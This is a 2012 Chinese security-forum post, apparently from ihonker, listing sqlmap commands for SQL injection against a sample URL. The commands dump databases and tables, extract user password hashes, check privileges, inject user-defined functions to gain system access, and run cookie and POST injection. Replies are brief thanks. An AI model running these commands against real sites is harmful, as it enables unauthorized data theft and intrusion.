查看: 19957|回复: 28

Sqlmap最新测试文档

[复制链接]
  • TA的每日心情

    2024-12-14 22:22
  • 签到天数: 1631 天

    [LV.Master]伴坛终老

    发表于 2012-8-3 10:08:52 | 显示全部楼层 |阅读模式

    sqlmap -h


    官方最新文档:http://sqlmap.sourceforge.net/doc/README.html


    sqlmap -u "http://www.ihonker.org /news?id=1"
    --current-user # 获取当前用户名称

    sqlmap -u "http://www.xxoo.com/news?id=1"
    --current-db  # 获取当前数据库名称

    sqlmap -u "http://www.xxoo.com/news?id=1"
    --tables  -D "db_name" #列表名

    sqlmap -u "http://www.ihonker.org /news?id=1"
    --columns -T "tablename" users-D "db_name" - v 0 #列字段

    sqlmap -u "http://www.ihonker.org /news?id=1"
    --dump
    - C "column_name"  -T "table_name" - D

    "db_name" -v 0  # 获取字段内容

    ****************** 信息获取 ******************

    sqlmap -u "http://www.ihonker.org /news?id=1"  --smart  --level 3 --users  # smart 智能 level  执行测试等级
    Sqlmap 最新测试文档 Email:linuxseclab@gmiall.com

    sqlmap -u "http://www.ihonker.org /news?id=1"  --dbms "Mysql" --users  # dbms 指定数据库类型

    sqlmap -u "http://www.ihonker.org /news?id=1"    --users  # 列数据库用户

    sqlmap -u "http://www.ihonker.org /news?id=1"    --dbs# 列数据库

    sqlmap -u "http://www.ihonker.org /news?id=1"   --passwords # 数据库用户密码

    sqlmap -u "http://www.ihonker.org /news?id=1"   --passwords-U root -v 0 # 列出指定用户数据库密码

    sqlmap -u "http://www.ihonker.org /news?id=1"    --dump -C "password,user,id" -T "tablename" - D "db_name" - - start 1 --stop 20  #列出指定字段,列出 20 条

    sqlmap -u "http://www.ihonker.org /news?id=1"    --dump-all -v 0 #列出所有数据库所有表

    sqlmap -u "http://www.ihonker.org /news?id=1"   --privileges # 查看权限

    sqlmap -u "http://www.ihonker.org /news?id=1"   --privileges -U root # 查看指定用户权限

    sqlmap -u "http://www.ihonker.org /news?id=1"    --is-dba - v 1 #是否是数据库管理员

    sqlmap -u "http://www.ihonker.org /news?id=1"    --roles # 枚举数据库用户角色

    sqlmap -u "http://www.ihonker.org /news?id=1"   --udf-inject # 导入用户自定义函数(获取系统权限!)

    sqlmap -u "http://www.ihonker.org /news?id=1"   --dump-all --exclude-sysdbs -v 0 # 列出当前库所有表

    sqlmap -u "http://www.ihonker.org /news?id=1"   --union-cols #union 查询表记录

    sqlmap -u "http://www.ihonker.org /news?id=1"   --cookie "COOKIE_VALUE" #cookie 注入

    sqlmap -u "http://www.ihonker.org /news?id=1"   -b # 获取 banner 信息

    sqlmap -u "http://www.ihonker.org /news?id=1" --data "id=3"  #post 注入

    sqlmap -u "http://www.ihonker.org /news?id=1"  -v 1 -f # 指纹判别数据库类型

    sqlmap -u "http://www.ihonker.org /news?id=1"  --proxy"http://127.0.0.1:8118" # 代理注入

    sqlmap -u "http://www.ihonker.org /news?id=1"--string"STRING_ON_TRUE_PAGE"  # 指定关键词

    游客,如果您要查看本帖隐藏内容请回复


    回复

    使用道具 举报

    该用户从未签到

    发表于 2012-8-3 10:27:31 | 显示全部楼层
    这个很有用处。。。感谢提供  sqlmap是个好工具
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2016-3-23 21:12
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2012-8-3 17:04:23 | 显示全部楼层
    为什么我装的BT5没有sqlmap啊
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2016-8-16 17:47
  • 签到天数: 5 天

    [LV.2]偶尔看看I

    发表于 2012-8-31 13:22:53 | 显示全部楼层
    哈哈 bt5
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-1-19 14:20:25 | 显示全部楼层
    谢谢最近研究这个
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-2-19 13:54:52 | 显示全部楼层
    这个不错,,,
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-3-14 16:01:41 | 显示全部楼层
    谢谢分享!!!!!!!!!!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-3-17 11:11:22 | 显示全部楼层
    看看隐藏的u我想要的
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2015-10-1 22:33
  • 签到天数: 2 天

    [LV.1]初来乍到

    发表于 2013-3-18 22:56:30 | 显示全部楼层
    不是在后面家命令吗
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2013-3-19 15:10:08 | 显示全部楼层
    工具需要认真研究灵活运用,学习ing
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-12-24 01:10 , Processed in 0.027927 second(s), 11 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部